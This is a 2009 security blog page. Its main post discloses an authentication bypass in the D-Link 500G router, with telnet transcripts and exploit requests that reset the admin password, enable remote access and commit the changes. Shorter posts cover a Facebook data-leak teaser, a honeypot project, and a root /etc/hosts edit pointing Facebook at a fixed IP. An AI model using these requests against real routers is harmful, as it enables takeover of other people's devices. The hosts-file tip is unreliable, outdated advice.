D-LINK 500G Authentication Bypass

Posted: August 24th, 2009 | Author: | Filed under: IT Related | Tags: , , , | 4 Comments »

SUMMARY
There is an authentication bypass vulnerability in D-Link 500G that allows an attacker to take full control over the device. Remote access is disabled by default, so the attacker is required to be on the local network.
The bypass can be triggered sending a HTTP request without the HOST header.

$ telnet 192.168.0.1 80
Trying 192.168.0.1...
Connected to 192.168.0.1.
Escape character is '^]'.
GET / HTTP/1.1
Host: 192.168.0.1
Connection: close
 
HTTP/1.1 401 Unauthorized
WWW-Authenticate: Basic Realm="DSL-500G"
Content-type: text/html
Content-length: 111
 
<html><head><title>401 Unauthorized Access</title></head><body><h1>401
Unauthorized Access</h1></body></html>
Connection closed by foreign host.
$ telnet 192.168.0.1 80
Trying 192.168.0.1...
Connected to 192.168.0.1.
Escape character is '^]'.
GET / HTTP/1.1
Connection: close
 
HTTP/1.1 302 Document Follows
Location: /hag/pages/home.ssi
 
Connection closed by foreign host.

AFFECTED PRODUCTS
Confirmed in D-Link 500G Firmware R2.01.B9.EU(030917a/T93.3.44).
Haven’t tested in other devices and version.

SOLUTION
The manufacturer has not been contacted. Don’t complain on me.

EXPLOIT

Reset the admin password: GET
/Action?cmdSubmit=Submit&ex_param1=admin&id=3&new_pass1=admin&new_pass2=admin&old_pass=admin&user=admin
HTTP/1.0
Enable remote access: GET /Action?cmdSubmit=Submit&remote=0&id=83
HTTP/1.0
Commit changes: GET /Action?cmdCommit=Commit&reboot_loc=0&id=4 HTTP/1.0

CREDITS
Discovered by Jardel Weyrich <jweyrich at gmail dot com>.

Facebook Identity Can be Compromised Just by Reading Forum Posts

Posted: August 21st, 2009 | Author: | Filed under: IT Related | 1 Comment »

I’ve stumbled across a small security vulnerability in Facebook that, after some thought, turned out to be a way to launch a powerful and surprising attack.

The attack allows personal information including full name, profile picture, and friends list to leak to an eagerly awaiting hacker. The uniqueness of this attack, is that the unaware user’s data may be stolen when she is surfing a legitimate, trusted site, not a site controlled by the attacker.

[Read MORE]

What happened to Milw0rm and Packetstorm

Posted: August 20th, 2009 | Author: | Filed under: IT Related | Tags: , , , | 2 Comments »

Mubic asked:

Str0ke said:

Mubic asked again:

And Str0ke answered:

ClientMe

Posted: August 20th, 2009 | Author: | Filed under: IT Related, Project | Tags: , , | 6 Comments »

ClientMe – Yet Another Client Side Honeypot

It is now in early implementation phase

P/S: This project insyaallah will be my master degree’s project at the same time

[updated on 25th August 2009, 11:01PM (GMT +8)]

ClientMe is now in v 0.01 Alpha [see HERE]

Facebook : Service Unavailable – DNS failure

Posted: August 20th, 2009 | Author: | Filed under: IT Related | Tags: , , , | 43 Comments »


dig seems to be OK

I’m still waiting for the news of why this thing happened..

[update]

DAMMIT!! I used “dig facebook.com” and not “dig www.facebook.com”.. ARGH!!!! Anyone has dig result for www.facebook.com? I pretty much believe that it has something to do with Akmai’s distributed servers

[update]

hi all, i believe that, this issues come some the distributed akmai server. If you are on Linux/Unix/Mac, this is what you can do:-

sudo -i
echo "69.63.191.219  www.facebook.com" >> /etc/hosts

then start browsing to facebook 🙂

« Older Entries
Newer Entries »